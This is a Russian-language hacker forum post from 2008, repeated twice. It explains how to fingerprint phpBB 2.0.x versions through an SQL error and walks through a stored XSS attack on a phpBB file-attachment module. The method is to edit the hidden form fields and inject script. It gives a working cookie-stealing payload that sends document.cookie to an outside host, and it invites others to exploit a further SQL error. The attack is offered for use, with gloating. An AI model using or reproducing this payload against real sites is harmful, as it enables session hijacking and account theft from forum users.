KIR@PRO
16.04.2008, 22:05
Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5
привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))
исходя из сообщения Basurman :
2.0.21 или 2.0.22?Как отличить последнюю версию второй ветки (2.0.22) от остальных? (пост восстановлен)
Очень просто. До последней версии был баг (не инъект!) в лимите во всех скритах, где присутствовал постраничный вывод на экран.
Например, в скрипте viewforum.php, который и рассмотрим.
Определить можно, добавив параметр start=-1 в адресной строке, например, к viewforum.php
То есть, если есть ccылка вида:
http://forum/viewforum.php?f=32
Набираем:
http://forum/viewforum.php?f=32&start=-1
Если вываливается с ошибкой - версия <=2.0.21
Если нет - 2.0.22
Could not obtain topic information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 12
SELECT t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time FROM topics t, users u, posts p, posts p2, users u2 WHERE t.forum_id = 50 AND t.topic_poster = u.user_id AND p.post_id = t.topic_first_post_id AND p2.post_id = t.topic_last_post_id AND u2.user_id = p2.poster_id AND t.topic_type <> 2 AND t.topic_type <> 3 ORDER BY t.topic_type DESC, t.topic_last_post_id DESC LIMIT -1, 20
Line : 420
File : /xxx/phpbb/viewforum.php
P.S. Все файлы, где есть параметр start можно найти в апдейтере 2.0.22
P.S.S На forums.overclockers.ru стоит не 2.0.22 (ну или сильно криворукий обновляльщик) ;)
рассмотренная мной версия >= 2.0.22
уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))
Уязвимые поля: attachment_list[]
filename_list[]
filesize_list[]
filetime_list[]
attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)
суть уязвимости:
при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
type у указанных выше полей на text, и изменяем и изменяем action формы на полный
путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie :))
все тоже самое с перечисленными выше скриптами...
на 3-й ветке пробовал там уже нету..... :cool:
Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб :D +
если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ;)
___________________________________
http://www.hash.ixces.ru/img.gif
не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать...
привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))
исходя из сообщения Basurman :
2.0.21 или 2.0.22?Как отличить последнюю версию второй ветки (2.0.22) от остальных? (пост восстановлен)
Очень просто. До последней версии был баг (не инъект!) в лимите во всех скритах, где присутствовал постраничный вывод на экран.
Например, в скрипте viewforum.php, который и рассмотрим.
Определить можно, добавив параметр start=-1 в адресной строке, например, к viewforum.php
То есть, если есть ccылка вида:
http://forum/viewforum.php?f=32
Набираем:
http://forum/viewforum.php?f=32&start=-1
Если вываливается с ошибкой - версия <=2.0.21
Если нет - 2.0.22
Could not obtain topic information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 12
SELECT t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time FROM topics t, users u, posts p, posts p2, users u2 WHERE t.forum_id = 50 AND t.topic_poster = u.user_id AND p.post_id = t.topic_first_post_id AND p2.post_id = t.topic_last_post_id AND u2.user_id = p2.poster_id AND t.topic_type <> 2 AND t.topic_type <> 3 ORDER BY t.topic_type DESC, t.topic_last_post_id DESC LIMIT -1, 20
Line : 420
File : /xxx/phpbb/viewforum.php
P.S. Все файлы, где есть параметр start можно найти в апдейтере 2.0.22
P.S.S На forums.overclockers.ru стоит не 2.0.22 (ну или сильно криворукий обновляльщик) ;)
рассмотренная мной версия >= 2.0.22
уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))
Уязвимые поля: attachment_list[]
filename_list[]
filesize_list[]
filetime_list[]
attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)
суть уязвимости:
при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
type у указанных выше полей на text, и изменяем и изменяем action формы на полный
путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie :))
все тоже самое с перечисленными выше скриптами...
на 3-й ветке пробовал там уже нету..... :cool:
Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб :D +
если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ;)
___________________________________
http://www.hash.ixces.ru/img.gif
не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать...